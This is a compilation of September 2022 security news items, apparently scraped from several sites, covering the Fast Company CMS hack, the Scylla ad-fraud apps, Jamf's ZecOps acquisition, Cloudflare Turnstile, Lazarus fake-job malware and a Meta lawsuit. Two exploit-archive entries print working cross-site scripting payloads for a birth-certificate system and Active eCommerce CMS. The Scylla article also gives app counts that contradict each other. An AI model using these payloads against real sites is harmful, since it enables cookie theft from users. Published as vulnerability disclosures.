The company's website remains offline after hackers used its compromised CMS to send out racist messages.

Fast Company, the business-news publication, has taken its website offline after cyberattackers compromised its content management system (CMS). They used the access to send out two obscene and racist push notifications to its Apple News subscribers.

The incident follows a similar defacement attack on the FastCompany.com homepage on Sunday, where the attackers posted similar language. The outlet replaced its website with a statement overnight on Tuesday, which remains in place at press time.

"The messages are vile and are not in line with the content and ethos of Fast Company," the company said in the notice. "Fast Company regrets that such abhorrent language appeared on our platforms and in Apple News, and we apologize to anyone who saw it before it was taken down."

The company is investigating the situation and working to clean the site, it said. While no details of the attack are yet available, James McQuiggan, security awareness advocate at KnowBe4, noted that the goal was clearly brand assassination, perhaps with a side of flexing.

"While cybercriminals always go for the money, from time to time, they like to demonstrate their boldness by showing they have access to sensitive or publicly viewable systems by posting something outside of the normal scope of information shared," he said in an emailed statement.

**Highlighting the Need for Better Security**

Christopher Budd, senior manager of threat research at Sophos, tells Dark Reading that this is just latest example of an attack against PR and news infrastructure to deliver false information, with another recent example being a fake press release claiming Walmart was to begin accepting bitcoin.

The attack "highlights the fragility of PR and news infrastructure, and showcases how attacks like these could potentially be carried out for more malicious purposes that result in more dire consequences," he says. "Ultimately, this attack shows how news channels form a critical information infrastructure, and that this infrastructure should be secured in ways that match its criticality."

On a broader level, Jason Kent, hacker in residence at Cequence Security, suspects a credential-stuffing attack could be in play, indicating that the "credentials weren't terribly sophisticated and not backed up by multifactor auth or VPN requirements," he says.

"Credential-stuffing attacks are some of the most pervasive attacks we see on a daily basis," he adds. "Attackers attempt to guess passwords for valid accounts, and if they are successful the attacker will utilize the full permission of those credentials. Privileged access should be closely monitored as once the attacker has those, they will perform all manner of havoc."

Fast Company CMS Hack Raises Security Questions

By Waqas
Before being removed, the Scylla ad fraud campaign used over 90 malicious apps to carry out its operation against Android and iOS users.
This is a post from HackRead.com Read the original post: Scylla Ad Fraud Attack on iOS and Android Users Halted by Apple and Google

The Satori Threat Intelligence and Research Team at Human identified a new wave of cyberattacks involving the use of malicious applications against iOS and Android users. The alarming fact is that these infected apps boast millions of downloads.

The good news is that the attack has been halted by Apple and Google after their prompt response to the researchers.

**Malicious Apps Found on Legitimate Platforms**

Reportedly, 89 malicious apps were discovered and used in a mobile fraud ad campaign. The apps collectively boasted around 13 million downloads. The researchers have dubbed this campaign Scylla.

Per their research, this campaign is the third installment of the Poseidon fraud campaign discovered in 2019, and its second installment was named Charybdis, which was detected in 2020.

You may be wondering where have you heard the term Scylla and Charybdis before. “Being between Scylla and Charybdis” is an idiom deriving from Greek mythology, which has been associated with the proverbial advice “to choose the lesser of two evils”.

In Greek mythology, Scylla and Charybdis were two monsters who lived on either side of a narrow channel of water. Scylla was a six-headed monster (_also featured in the TV series Prison Break_) who lived on a rock in the middle of the channel. Charybdis was a whirlpool who lived on the other side of the channel.

As for the malicious campaign, out of these 89 apps, 89 are Android, and 9 are iOS-based apps. The malicious apps perform ad fraud via hidden apps, spoofing, and fake clicks. What makes Scylla different from the earlier two mobile fraud campaigns is that this time the attackers have found a way to target iOS devices too.

**More Android Malware News**

1.  New malware targeting IoT devices, Android TV globally
2.  LG Smart TV Screen Bricked in Android Ransomware Attack
3.  Top 10 Android Educational Apps That Collect Most User Data?
4.  Fake Banking Rewards Apps Install Malware on Android Phones
5.  Hacked Android phones mimicked TV products for fake ad views

**Campaign Analysis**

According to the company’s blog post, just like the Charybdis campaign, the apps used in Scylla also contained obfuscated code. The attack mechanism is also somewhat the same as the apps target advertising software development kits/SDKs.

One of the iOS apps called “Wood Sculptor,” linked to the Scylla ad fraud campaign (Source: Satori Threat Intelligence and Research Team)

It is worth noting that some apps contained code that posed as completely different when observed by advertisers and ad tech firms.

> “These tactics, combined with the obfuscation techniques first observed in the Charybdis operation, demonstrate the increased sophistication of the threat actors behind Scylla.”
> 
> Satori Threat Intelligence and Research Team

**Application Detailed Overview**

Human researchers detected 29 Android apps posed as more than six thousand CTV-based apps to encourage higher ad proceeds than mobile games. Conversely, some apps contained code that informed advertisers of the ads they displayed to the user.

This means the code rendered ads after the apps were closed, such as when the home screen was on. Some apps captured the information about what ads the user clicked on and transferred the info to advertisers as a fake click. Most of the malicious apps were games.

Google and Apple were promptly informed about malicious apps’ presence and quickly removed from their respective platforms. Advertising SDK developers were also informed about the attack.

Human also published a list of malicious apps and urged users to remove them if installed on their devices. To remove these apps, just tap and hold the App and tap on the Remove option. Then tap on Delete App.

**More iOS Malware News**

1.  SolarWinds hackers exploited iOS 0-day to hack iPhones
2.  Malicious SDK spying, defrauding users through iOS apps
3.  Facebook removes accounts for iOS, and Android malware
4.  Fake Covid-19 apps hit Android and iOS users with spyware
5.  Install Malware on iPhone When it is Powered Off – Research

I am a UK-based cybersecurity journalist with a passion for covering the latest happenings in cyber security and tech world. I am also into gaming, reading and investigative journalism

Scylla Ad Fraud Attack on iOS and Android Users Halted by Apple and Google

ZecOps extends Jamf's mobile security capabilities by adding advanced detections and incident response.

**MINNEAPOLIS, Sept. 26, 2022 (GLOBE NEWSWIRE) —** Jamf (NASDAQ: JAMF), the standard in Apple Enterprise Management, today announced it signed a definitive agreement to acquire ZecOps Inc., a leader in mobile detection and response.

This acquisition uniquely positions Jamf to help IT and security teams strengthen their organization's mobile security posture, accelerating mobile security investigations from weeks to minutes, leverage known indicators of compromise (IOC) at-scale, and identify sophisticated 0- or 1-click attacks on a much deeper scale.

"I am very excited to bring ZecOps' market-leading advanced mobile detection and response capabilities into the Jamf platform," said Dean Hager, CEO, Jamf. "We believe ZecOps has built a differentiated solution that meets a very important need for many organizations — the ability to thoroughly detect and investigate threats that target mobile users so they can confidently use these powerful devices for work. This capability further propels our goal of continuing to bridge the gap between what Apple provides and the enterprise requires."

Mobile devices now account for 59% of global website traffic, and according to the 2022 Verizon Mobile Security Index, close to half (45%) of companies said that they have suffered a compromise involving a mobile device in the past 12 months.

ZecOps will bring important capabilities to the Jamf platform to help address the growing trend of targeted mobile attacks. Jamf offers robust management and mobile security capabilities for iOS devices; however, access to deeper insights into potential security exploits is technically challenging and requires physical access to the device, which is difficult in a remote work environment. ZecOps is a robust, unparalleled solution that provides the deepest layer of insight and assurance for security-conscious customers with high-value targets that need something more. ZecOps provides the same level of visibility currently available for macOS through Jamf Protect but for iOS, making it capable of detecting the kinds of sophisticated mobile threats that Apple's Lockdown mode aims to prevent. With ZecOps, users can have both Lockdown mode and ZecOps software operating at the same time.

**Advanced threat hunting on mobile devices**  
Advanced protection of mobile devices requires a layered approach. Proactive investigation and analysis complement device management and mobile threat defense for more advanced detections and preventative protections. ZecOps enables advanced threat hunting by capturing and analyzing logs from iOS and Android devices at the operating system layer, allowing security operations and incident response teams to perform automatic or on-demand mobile cyber investigations.

**Digital forensics and incident response**  
Security teams are already drowning in data. Event logs, analyst reports, third-party threat intelligence feeds, and more are produced regularly for applications, endpoints, and network infrastructure. Mobile has historically been left out of this data feed. Many investigation teams lack expertise in modern mobile platforms. ZecOps' sophisticated digital forensics capabilities provides Security Operation Center (SOC) teams with unique mobile threat intelligence to uncover zero-day attacks. ZecOps does the heavy lifting for SOC teams, saving months of work per investigation. The solution automatically constructs a timeline of suspicious events and indicators of compromise to demonstrate when and how a device was impacted.

**Privacy conscious**  
Data privacy is extremely important to Jamf. ZecOps shares Jamf's commitment to safeguarding user data by ensuring log collection doesn't include the user's material personal data such as photos, videos, text messages and call logs, and only leveraging low-level system information and diagnostics data to the cloud for analysis. ZecOps analysis can also take place on-premises to meet various organizations' and governments data privacy requirements.

"We founded ZecOps to catch hidden 0-click and 1-click attacks," said Zuk Avraham, co-founder and CEO, ZecOps. "By combining with Jamf, we can offer our customers a truly powerful mobile threat intelligence and threat hunting capabilities that will keep up with the evolving threat landscape without compromising the user experience."

This transaction is subject to the satisfaction of customary closing conditions and is expected to close in the fourth quarter. Terms of the transaction were not disclosed.

**About Jamf**  
Jamf's purpose is to simplify work by helping organizations manage and secure an Apple experience that end users love and organizations trust. Jamf is the only company in the world that provides a complete management and security solution for an Apple-first environment that is enterprise secure, consumer simple and protects personal privacy. To learn more, visit www.jamf.com.

**About ZecOps**  
ZecOps develops the world's most powerful platform to discover and analyze mobile cyber attacks. Used by world-leading enterprises, governments and individuals globally, ZecOps Mobile Detection and Response platform provides a realistic and scalable approach to mobile threat hunting. ZecOps enables automated discovery of 0-day attacks and Advanced Persistent Threats (APTs), delivering anti cyber-espionage capabilities within minutes.

**Forward-Looking Statements**  
This release relates to a pending acquisition of ZecOps, Inc. ("ZecOps") by Jamf Holding Corp. ("Jamf", "we", our" or "us"). This release contains forward-looking statements within the meaning of the "safe harbor" provisions of the Private Securities Litigation Reform Act of 1995, regarding the anticipated benefits of the acquisition, and the anticipated impacts of the acquisition on our business, products, financial results, and other aspects of our and ZecOps' operations. You can identify forward-looking statements by the fact that they do not relate strictly to historical or current facts. These statements may include words such as "anticipate," "estimate," "expect," "project," "plan," "intend," "believe," "may," "will," "should," "can have," "likely," and other words and terms of similar meaning in connection with any discussion of the timing or nature of future operating or financial performance or other events. These risks, uncertainties, assumptions, and other factors include, but are not limited to: the effect of the announcement of the acquisition on the ability of Jamf or ZecOps to retain key personnel or maintain relationships with customers, vendors, developers, community members, and other business partners; risks that the acquisition disrupts current plans and operations; the ability of the parties to consummate the acquisition on a timely basis or at all; the satisfaction of the conditions precedent to consummation of the acquisition; our ability to successfully integrate ZecOps' operations; our and ZecOps' ability to execute on our business strategies relating to the acquisition and realize expected benefits and synergies; and our ability to compete effectively, including in response to actions our competitors may take following announcement of the acquisition. Further information on these and additional risks, uncertainties, and other factors that could cause actual outcomes and results to differ materially from those included in or contemplated by the forward-looking statements contained in this release are included under the caption "Forward-Looking Statements" and elsewhere in our Form 10-Q for the quarter ended June 30, 2022, and other filings and reports we make with the Securities and Exchange Commission from time to time. Moreover, both we and ZecOps operate in a very competitive and rapidly changing environment, and new risks may emerge from time to time. It is not possible for us to predict all risks, nor can we assess the impact of all factors on our business or the acquisition, or the extent to which any factor, or combination of factors, may cause actual results or outcomes to differ materially from those contained in any forward-looking statements we may make. Forward-looking statements speak only as of the date the statements are made and are based on information available to us at the time those statements are made and/or our management's good faith belief as of that time with respect to future events. Except as required by law, we undertake no obligation, and do not intend, to update these forward-looking statements.

SOURCE: Jamf

Jamf Announces Intent to Acquire ZecOps, to Provide a Market-Leading Security Solution for Mobile Devices as Targeted Attacks Continue to Grow

The internet infrastructure company has an alternative tool to check whether you’re human—and it doesn’t force you to pick out buses in tiny boxes.

There's a uniquely bitter rage that comes from being asked to click every box that contains a parking meter only to then be told that you missed one because of a tiny sliver of gray that barely floated into the periphery of an otherwise empty, adjacent square. It's a familiar fury, and one that captchas have been provoking across the web for years, but these maddening tools are important for blocking bots from conducting fraud and other abuse. Google's reCaptcha, the dominant tool around the world for implementing these checks, came out with a version in 2018 that uses machine learning to silently check humanness behind the scenes and phase out the garbled, blurry strings of letters and grids full of traffic lights. This week, the internet infrastructure company Cloudflare is releasing a competitor.

Like reCaptcha, Cloudflare's new alternative, dubbed Turnstile, is free, and you don't have to be a Cloudflare customer to put it on your site. Turnstile is based on a tool called Cloudflare Managed Challenge that the company released for its own services in April. When you do a captcha, you are completing a “challenge” of your humanness. Managed Challenge, on the other hand, runs quick and silent checks of your browser's technical behavior and other telemetry in an attempt to determine that you are human without asking you to do anything. Only when the tool lacks adequate confidence will it show you a “harder challenge” or a puzzle to solve. And Managed Challenge, which is an enterprise product for Cloudflare customers, is constantly testing different types of puzzles to find the options that are less frustrating for users. 

Anyone can now implement Turnstile for free through an application programming interface. You can set it up to only run invisible challenges that don't appear to the user at all or elect to have the system show a button for users to click as an additional humanness check. Unlike Managed Challenge, Turnstile never shows harder challenges or Captchas.

“If a person were walking down the street next to a robot, even without asking the person or robot any questions, you’d be able to observe differences between them just by watching them walk past,” says Cloudflare's chief technology officer, John Graham-Cumming. “Turnstile can do that for the signals your computer sends to the website you’re accessing, which include what web browser you are using or what device this is coming from. In the case of a machine trying to impersonate a human user, they often don’t get all these details right—there’s usually something ‘off’ about the request.”

Invisible challenges include tests like complex equations that devices are asked to solve. Turnstile has data about how long it takes different devices—say, a Macbook Air or a Samsung Galaxy—to solve the challenge. If a device claims to be a Samsung Galaxy S22, but solves the challenge much more quickly than that device should be able to, it may indicate that the request is really coming from an automated system run out of a data center. 

Courtesy of Cloudfare

Captchas are an important security defense across the web, but Cloudflare is billing Turnstile as particularly privacy-protective as well. The tool will look at some browser session data, like browser characteristics and data from website rendering mechanisms, but the service doesn't check advertising cookies or login cookies. And the company plans to outsource as much data review as possible to minimize how much Cloudflare ever sees. For example, Turnstile will check for Apple's "Private Access Tokens," launched this year as a tool for attesting that a user is human and reducing the need for captchas. 

Researchers have found in recent years that Google's reCaptcha checks to see whether a user has a Google login cookie as one of the factors in determining whether they are human. Google denies that reCaptcha data is used for anything other than challenges, but some have pointed out that the data could be used in targeted advertising campaigns.

Cloudflare says that since launching Managed Challenge, it has dramatically reduced the number of captchas it serves.

“Before we introduced Cloudflare Managed Challenge, if we believed a visitor was a bot but our customer wanted us to confirm that, then we would serve a Captcha 100 percent of the time,” Graham-Cumming says. “After introducing Cloudflare Managed Challenge, that number was reduced down to 9 percent. Today, that number is further reduced down to 3 percent.”

The company adds that users previously spent an average of 32 seconds doing captchas on its own sites. Since implementing Managed Challenge, the average wait time is one second because of the new feature's silent, behind-the-scenes challenges. In the Cloudflare dashboard, the captcha option is now called “Legacy Captcha." The company says that, “this more accurately describes what CAPTCHA is: an outdated tool that we don’t think people should use."

Turnstile is part of a broader industry effort to rework captchas and make them less frustrating for users. But reCaptcha's ubiquity and familiarity may hinder adoption of new alternatives. As the field shifts, though, it may be ripe for a new player—especially one that doesn't make you want to chuck your laptop into the sea.

_Updated 9-28-2022, 6:20 pm ET: Included additional details about Turnstile and comment from Cloudflare. We also clarified the types of “challenges” Turnstile will present users._

Cloudflare Takes a Stab at a Captcha That Doesn’t Suck

Previously observed using fake Coinbase jobs, the North Korea-sponsored APT has expanded into using Crypo.com gigs as cover to distribute malware.

Researchers are warning that Lazarus has expanded its campaign using fake jobs with cryptocurrency exchanges to trick macOS users into downloading malware.

Just last month, researchers observed Lazarus using Coinbase job openings to trick macOS users into downloading malware. Now, SentinelOne says the same threat group has expanded its phishing campaign to include fraud job postings at another cryptocurrency exchange, Crypto.com.

According to the SentinelOne report on the new crypto job lure, the additional victims were initially contacted by Lazarus through LinkedIn messaging.

Lazarus is an advanced persistent threat (APT) group with ties to the North Korean state. SentinelOne pointed out that the attack group has been targeting cryptocurrency exchanges since 2018, and has specifically used fake cryptocurrency exchange jobs as lures since 2020.

"The Lazarus (aka Nukesped) threat actor continues to target individuals involved in cryptocurrency exchanges," the SentinelOne researchers wrote. "This has been a long-running theme going as far back as the AppleJeus campaigns that began in 2018."

Keep up with the latest cybersecurity threats, newly-discovered vulnerabilities, data breach information, and emerging trends. Delivered daily or weekly right to your email inbox.

Subscribe

Lazarus Lures Aspiring Crypto Pros With Fake Exchange Job Postings

Online Birth Certificate Management System version 1.0 suffers from a persistent cross site scripting vulnerability.

**Online Birth Certificate Management System 1.0 Cross Site Scripting**

Posted Sep 27, 2022

Authored by Yousef Alraddadi

Online Birth Certificate Management System version 1.0 suffers from a persistent cross site scripting vulnerability.

tags | exploit, xss

SHA-256 | 7e9852e1ba3b10ed9809857eace8d6e330d1f9d7306d8b2d80c0851d85229f86

Download | Favorite | View

**Online Birth Certificate Management System 1.0 Cross Site Scripting**

    # Exploit Title: Online Birth Certificate Management System - Stored Cross-Site Scripting (XSS)# Google Dork: N/A# Date: 2022-9-27# Exploit Author: yousef alraddadi - https://twitter.com/y0usef_11# Vendor Homepage: https://www.sourcecodester.com/php/15683/online-birth-certificate-management-system-php-free-download.html# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/OBCMS.zip# Tested on: windows 11 - XAMPP# CVE : N/A# Version: 1.0Vulnerability Details======================Steps :1) Log in to the application after register new userUsername: testPassword: 123452) Navigate to Birth Reg Form and Click on Add Details.3) add full name payload => <script>alert(document.cookie);</script>4) and all field enter payload only Contact Number enter number

**File Tags**

*   ActiveX (932)
*   Advisory (78,276)
*   Arbitrary (15,276)
*   BBS (2,859)
*   Bypass (1,598)
*   CGI (1,013)
*   Code Execution (6,771)
*   Conference (671)
*   Cracker (799)
*   CSRF (3,277)
*   DoS (22,065)
*   Encryption (2,340)
*   Exploit (50,129)
*   File Inclusion (4,160)
*   File Upload (945)
*   Firewall (821)
*   Info Disclosure (2,565)
*   Intrusion Detection (861)
*   Java (2,823)
*   JavaScript (808)
*   Kernel (6,156)
*   Local (14,093)
*   Magazine (586)
*   Overflow (12,252)
*   Perl (1,413)
*   PHP (5,057)
*   Proof of Concept (2,284)
*   Protocol (3,350)
*   Python (1,406)
*   Remote (29,862)
*   Root (3,466)
*   Ruby (581)
*   Scanner (1,630)
*   Security Tool (7,737)
*   Shell (3,077)
*   Shellcode (1,203)
*   Sniffer (883)
*   Spoof (2,123)
*   SQL Injection (16,057)
*   TCP (2,369)
*   Trojan (682)
*   UDP (872)
*   Virus (660)
*   Vulnerability (30,657)
*   Web (9,114)
*   Whitepaper (3,723)
*   x86 (943)
*   XSS (17,396)
*   Other

**File Archives**

*   September 2022
*   August 2022
*   July 2022
*   June 2022
*   May 2022
*   April 2022
*   March 2022
*   February 2022
*   January 2022
*   December 2021
*   November 2021
*   October 2021
*   Older

**Systems**

*   AIX (426)
*   Apple (1,899)
*   BSD (369)
*   CentOS (55)
*   Cisco (1,915)
*   Debian (5,948)
*   Fedora (1,690)
*   FreeBSD (1,242)
*   Gentoo (4,207)
*   HPUX (878)
*   iOS (323)
*   iPhone (108)
*   IRIX (220)
*   Juniper (67)
*   Linux (42,923)
*   Mac OS X (684)
*   Mandriva (3,105)
*   NetBSD (255)
*   OpenBSD (478)
*   RedHat (12,009)
*   Slackware (941)
*   Solaris (1,607)
*   SUSE (1,444)
*   Ubuntu (8,027)
*   UNIX (9,115)
*   UnixWare (185)
*   Windows (6,473)
*   Other

Online Birth Certificate Management System 1.0 Cross Site Scripting

Categories: News
Categories: Privacy
Meta is being sued by a couple of its users for allegedly deliberately circumventing Apple's privacy features on the iPhone.



(Read more...)




The post Facebook users sue Meta for allegedly building "secret workaround" to Apple privacy safeguards appeared first on Malwarebytes Labs.

Posted: September 27, 2022 by

Last week, two Facebook users filed a class-action complaint against Meta in San Francisco's federal court, alleging the company built a "secret workaround" to Apple's safeguards that protect iPhone users from tracking. Facebook circumvents Apple's privacy rules by opening in-app browsers within its apps instead of the iPhone's default browser. By doing this, the users further allege Meta violated state and federal laws regarding the unauthorized collection of personal data.

The suit came after Felix Krause (@KrauseFx), a data privacy researcher and former Google engineer, released a report in August 2022 about iOS privacy, featuring a tool he created himself called the InAppBrowser. It can check if an in-app browser injects JavaScript (JS) code, which could be problematic for iOS and Android users as this causes potential security and privacy risks to users.

In the case of Meta, this JS code is Meta Pixel.

"The iOS Instagram and Facebook app render all third party links and ads within their app using a custom in-app browser," said Krause in his blog. "This causes various risks for the user, with the host app being able to track every single interaction with external websites, from all form inputs like passwords and addresses, to every single tap."

Krause also included the following caveat: "**Important**: Just because an app injects JavaScript into external websites, doesn’t mean the app is doing anything malicious. There is no way for us to know the full details on what kind of data each in-app browser collects, or how or if the data is being transferred or used."

In an email interview with Bloomberg, a spokesperson from Meta said that Krause's allegations are "without merit" and it will defend itself.

"We have designed our in-app browser to respect users' privacy choices, including how data may be used for ads," the email statement said.

In February, Meta admitted that Apple's App Tracking Transparency (ATT) feature would decrease its ad revenue by $10B. This admission, according to CNBC, is "the most concrete data point so far on the impact to the advertising industry" in terms of Apple's privacy feature, which limits companies from accessing the data of iPhone users.

"This allows Meta to intercept, monitor, and record its users' interactions and communications with third parties, providing data to Meta that it aggregates, analyzes, and uses to boost its advertising revenue," the suit reads.

Facebook and Instagram weren't the only apps mentioned in Krause's report. TikTok, Snapchat, and Amazon were also mentioned.

**RELATED ARTICLES**

Facebook users sue Meta for allegedly building "secret workaround" to Apple privacy safeguards

As many as 75 apps on Google Play and 10 on Apple App Store have been discovered engaging in ad fraud as part of an ongoing campaign that commenced in 2019.
The latest iteration, dubbed Scylla by Online fraud-prevention firm HUMAN Security, follows similar attack waves in August 2019 and late 2020 that go by the codename Poseidon and Charybdis, respectively.
Prior to their removal from the app

As many as 75 apps on Google Play and 10 on Apple App Store have been discovered engaging in ad fraud as part of an ongoing campaign that commenced in 2019.

The latest iteration, dubbed **Scylla** by Online fraud-prevention firm HUMAN Security, follows similar attack waves in August 2019 and late 2020 that go by the codename Poseidon and Charybdis, respectively.

Prior to their removal from the app storefronts, the apps had been collectively installed more than 13 million times.

The original Poseidon operation comprised over 40 Android apps that were designed to display ads out of context or hidden from the view of the device user.

Charybdis, on the other hand, was an improvement over the former by making use of code obfuscation tactics to target advertising platforms.

Scylla presents the latest adaption of the scheme in that it expands beyond Android to make a foray into the iOS ecosystem for the first time, alongside relying on additional layers of code roundabout using the Allatori tool.

These apps, once installed, are engineered to commit different kinds of ad fraud, marking a significant step up in sophistication from previous variants.

These include spoofing popular apps such as streaming services to trick advertising SDKs into placing ads, serving out-of-context and "hidden" ads via off-screen WebViews, and generating fraudulent ad clicks to profit off ads.

"In layman's terms, the threat actors code their apps to pretend to be other apps for advertising purposes, often because the app they're pretending to be is worth more to an advertiser than the app would be by itself," the company said.

As always, users are advised to scrutinize apps prior to downloading them, and avoid third-party app stores on the web that could harbor malicious applications.

Found this article interesting? Follow THN on Facebook, Twitter __ and LinkedIn to read more exclusive content we post.

Experts Uncover 85 Apps with 13 Million Downloads Involved in Ad Fraud Scheme

The infamous Lazarus Group has continued its pattern of leveraging unsolicited job opportunities to deploy malware targeting Apple's macOS operating system.
In the latest variant of the campaign observed by cybersecurity company SentinelOne last week, decoy documents advertising positions for the Singapore-based cryptocurrency exchange firm Crypto.com.
The latest disclosure builds on previous

The infamous Lazarus Group has continued its pattern of leveraging unsolicited job opportunities to deploy malware targeting Apple's macOS operating system.

In the latest variant of the campaign observed by cybersecurity company SentinelOne last week, decoy documents advertising positions for the Singapore-based cryptocurrency exchange firm Crypto.com.

The latest disclosure builds on previous findings from Slovak cybersecurity firm ESET in August, which delved into a similar phony job posting for the Coinbase cryptocurrency exchange platform.

Both these fake job advertisements are just the latest in a series of attacks dubbed Operation In(ter)ception, which, in turn, is a constituent of a broader campaign tracked under the name Operation Dream Job.

Although the exact distribution vector for the malware remains unknown, it's suspected that potential targets are singled out via direct messages on the business networking site LinkedIn.

The intrusions commence with the deployment of a Mach-O binary, a dropper that launches the decoy PDF document containing the job listings at Crypto.com, while, in the background, it deletes the Terminal's saved state ("com.apple.Terminal.savedState").

The downloader, also similar to the safarifontagent library employed in the Coinbase attack chain, subsequently acts as a conduit for a bare-bones second-stage bundle named "WifiAnalyticsServ.app," which is a copycat version of "FinderFontsUpdater.app."

"The main purpose of the second-stage is to extract and execute the third-stage binary, wifianalyticsagent," SentinelOne researchers Dinesh Devadoss and Phil Stokes said. "This functions as a downloader from a \[command-and-control\] server."

The final payload delivered to the compromised machine is unknown owing to the fact that the C2 server responsible for hosting the malware is currently offline.

These attacks are not isolated, for the Lazarus Group has a history of carrying out cyber-assaults on blockchain and cryptocurrency platforms as a sanctions-evading mechanism, enabling the adversaries to gain unauthorized access to enterprise networks and steal digital funds.

"The threat actors have made no effort to encrypt or obfuscate any of the binaries, possibly indicating short-term campaigns and/or little fear of detection by their targets," the researchers said.

Found this article interesting? Follow THN on Facebook, Twitter __ and LinkedIn to read more exclusive content we post.

North Korea's Lazarus Hackers Targeting macOS Users Interested in Crypto Jobs

Active eCommerce CMS version 6.3.0 suffers from a cross site scripting vulnerability.

    # Exploit Title: Active eCommerce CMS Cross Site Scripting# Exploit Author: th3d1gger# Vendor Homepage: https://codecanyon.net# Software Link: https://codecanyon.net/item/active-ecommerce-cms/23471405# Version: Version 6.3.0# Tested on Ubuntu 18.04-------Request-----------POST /ajax-search HTTP/1.1Host: localhostContent-Length: 117sec-ch-ua: "Chromium";v="103", ".Not/A)Brand";v="99"Accept: */*X-Requested-With: XMLHttpRequestsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.134 Safari/537.36sec-ch-ua-platform: "Linux"Content-Type: application/x-www-form-urlencoded; charset=UTF-8Origin: http://localhostSec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: http://localhost/Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: allow=1; remember_web_59ba36addc2b2f9401580f014c7f58ea4e30989d=eyJpdiI6IlRwa1o2cDhxRGtqTUxKL2tLS0NiVGc9PSIsInZhbHVlIjoiajVqT2VOeTk5RmVXY20yaG44ekFQbTc4OFZ3K2EvbThhTFFVUjBzdVpZNmtDQVlocndZU1pEeWFlaURPWDl3V2JsZGFxeDYyR1NWRGoyVHRDYW9iVExUck12NTNjVHZ3VWF2eHNWN1dScXNRdW81ZUNPeldnZ2FRdHVxODlsWnI1cDhWOEcvQlZWSi83VEM5WTJNNC9CME5PWVVyU2dDNWhNcUlvSXU1UWlsQjF2eTYxdmQ2aW5EZHNkYVBQMUpObEN2aFp6Y0tvUkhrUkFac0ZveURZZ0NFMHlPWjRYYSs0eTNTR3VPVXZUMD0iLCJtYWMiOiJjYmU1ZWYxODJlZjYyNzAyODI5YjM4NWEzMDgyYWFkMzA2YmIzOWM3ODA3ZjgyNjMzZWRjMDc3MDkxNWEzZGQ3In0%3D; twk_idm_key=-J__vZrlSOiy2FYLE4Fsu; twk_uuid_5a7c31ded7591465c7077c48=%7B%22uuid%22%3A%221.AGEpC4jGGoH2T6v2QAlePuWJRFfI9oZIu0RUbaNluAgJJzDJQ1zFcS1Fv9uH7mP6PIgcXCE6JVCXLF7JZsX0kHOsQNihqwO81D79ESmlYkVwYf5UHnjWKkJkiJPYK7Dn%22%2C%22version%22%3A3%2C%22domain%22%3Anull%2C%22ts%22%3A1663797922828%7D; TawkConnectionTime=0; XSRF-TOKEN=CPX7GmsCyaC1NSvSVXt1Ukjv6BDMmcEFsFYijPYB; active_ecommerce_cms_session=zQGudzxBZLEDymY6TvM4yDEKrxTAQJ7FAVIAQEBUConnection: close_token=CPX7GmsCyaC1NSvSVXt1Ukjv6BDMmcEFsFYijPYB&search=%3Cscript%3Ealert(%22oh+bought+the+happines%22)%3C%2Fscript%3E

Tag

#apple